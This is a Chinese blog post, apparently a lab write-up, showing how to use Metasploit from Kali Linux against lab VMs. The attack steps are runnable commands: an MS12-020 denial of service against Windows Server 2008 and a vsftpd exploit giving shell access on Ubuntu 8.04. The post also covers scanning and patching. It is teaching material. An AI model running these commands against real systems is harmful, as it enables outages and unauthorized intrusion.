网络安全: Kali Linux 使用 MSF 渗透测试

发布于:2024-03-06 ⋅ 阅读:(165) ⋅ 点赞:(0)

目录

一、实验

1.环境

2.登录MSF(Metasploit Framework)控制台

3.MSF初始化

4.MSF 管理工作区

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

7.Kali Linux (2024.1) 对Windows server 进行DOS 

8.Windows server 安装补丁

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

二、问题

1.MSF常用模块与基础命令


一、实验

1.环境

(1)主机

表1  主机

系统 版本 IP 备注
Kali Linux 2024.1

192.168.204.146(动态)

192.168.204.100(静态)

Windows server 2008 R2 192.168.204.150 Kali(2024.1)的目标主机
Kali Linux 2022.4

192.168.204.154(动态)

Ubuntu 8.04 192.168.204.143 Kali(2022.4)的目标主机

(2)查看Kali Linux (2024.1)系统版本

cat /etc/os-release

(3)查看Kali Linux (2024.1)系统IP地址

ip addr

(4) 查看Windows server 2008 IP 地址

ipconfig

 (5)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(6) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(7)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2.登录MSF(Metasploit Framework)控制台

(1)Kali Linux (2024.1)系统版本

msfconsole

启动

进入并退出

(2)Kali Linux (2022.4)系统版本

msfconsole

启动

进入并退出

3.MSF初始化

(1)Kali Linux (2024.1)系统版本

初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

(2)Kali Linux (2022.4)系统版本

 初始化数据库

msfdb init

开机自启动

systemctl enable postgresql --now

进入MSF 控制台

msfconsole

4.MSF 管理工作区

(1)Kali Linux (2024.1)系统版本

 查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  cicd

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  cicd

扫描Windows server数据

db_nmap 192.168.204.150

(2)Kali Linux (2022.4)系统版本

查看当前工作区

workspace

创建⼯作区 , ⾃动切换到新⼯作区

workspace  -a  devops

切换到 default ⼯作区

workspace  default

删除⼯作区

workspace  -d  devops

 扫描Ubuntu数据

db_nmap 192.168.204.143

5.Kali Linux (2024.1) 对Windows server 进行网址目录扫描

(1) 搜索 dir_scan 脚本

search dir_scan 

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.150

(4)运⾏脚本

run 

6.Kali Linux (2022.4) 对Ubuntu进行网址目录扫描

 (1) 搜索 dir_scan 脚本

search dir_scan 

 (2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run 

 7.Kali Linux (2024.1) 对Windows server 进行DOS 

(1) 搜索 dir_scan 脚本

search ms12-020

(2) 使⽤编号为 1 的脚本

use 1

(3) 设置⽬标主机

 set rhosts 192.168.204.150

查看Windows server状态

(4)运⾏脚本

run 

查看Windows server状态

8.Windows server 安装补丁

(1)Windows 补丁查询

Microsoft Update Catalog

(2)搜索

ms12-020

(3)安装补丁

重启

 (4)Kali Lnux (2024.1) 使用MSF运⾏脚本

run 

(5)Windows server

保持正常

9.Kali Linux (2022.4) 对Ubuntu 进行漏洞利⽤

(1) 查看目标主机

先返回

back

目标主机为192.168.204.143

db_nmap -sP 192.168.204.0/24

扫描开放端口

db_nmap -sV 192.168.204.143

21端口已打开

 (2) 搜索 vsftpd 脚本

search vsftpd

(2) 使⽤编号为 0 的脚本

use 0

(3) 设置⽬标主机

 set rhosts 192.168.204.143

(4)运⾏脚本

run 

//查看当前目录
pwd

//查看当前用户
whoami

//查看端口
netstat -antlp | grep 80

//查看进程
ps -elf | grep sshd

退出

exit

二、问题

1.MSF常用模块与基础命令

(1)模块

1)Auxiliary 辅助
⼀般负责执⾏扫描、嗅探、指纹识别、爆破等相关功能以辅助攻击,不直接在测试机和⽬标机之间建立访问。

2)Exploit 漏洞利⽤
利⽤发现的安全漏洞或配置弱点对远程⽬标进⾏攻击,以植入和运⾏攻击载荷。

3)Payloads 载荷
⽬标系统在被渗透攻击之后完成实际攻击功能的代码,成功渗透⽬标后,⽤于在⽬标系统上运⾏任意命令或者执⾏特定代码。

4)Post 后渗透
在取得⽬标的远程控制权以后,可以进⼀步实施的攻击动作,如获取敏感信息、实施跳板攻击等。

(2)命令

?            //获取帮助
? show       //查看show指令的帮助
search       //搜索模块
use          //使⽤模块
set          //设置模块选项
run          //运⾏当前模块
options      //列出当前模块的选项
show         //查看模块或相关信息
back         //返回上⼀步
exit/quit    //退出

本文含有隐藏内容,请 开通VIP 后查看

网站公告


今日签到

点亮在社区的每一天
去签到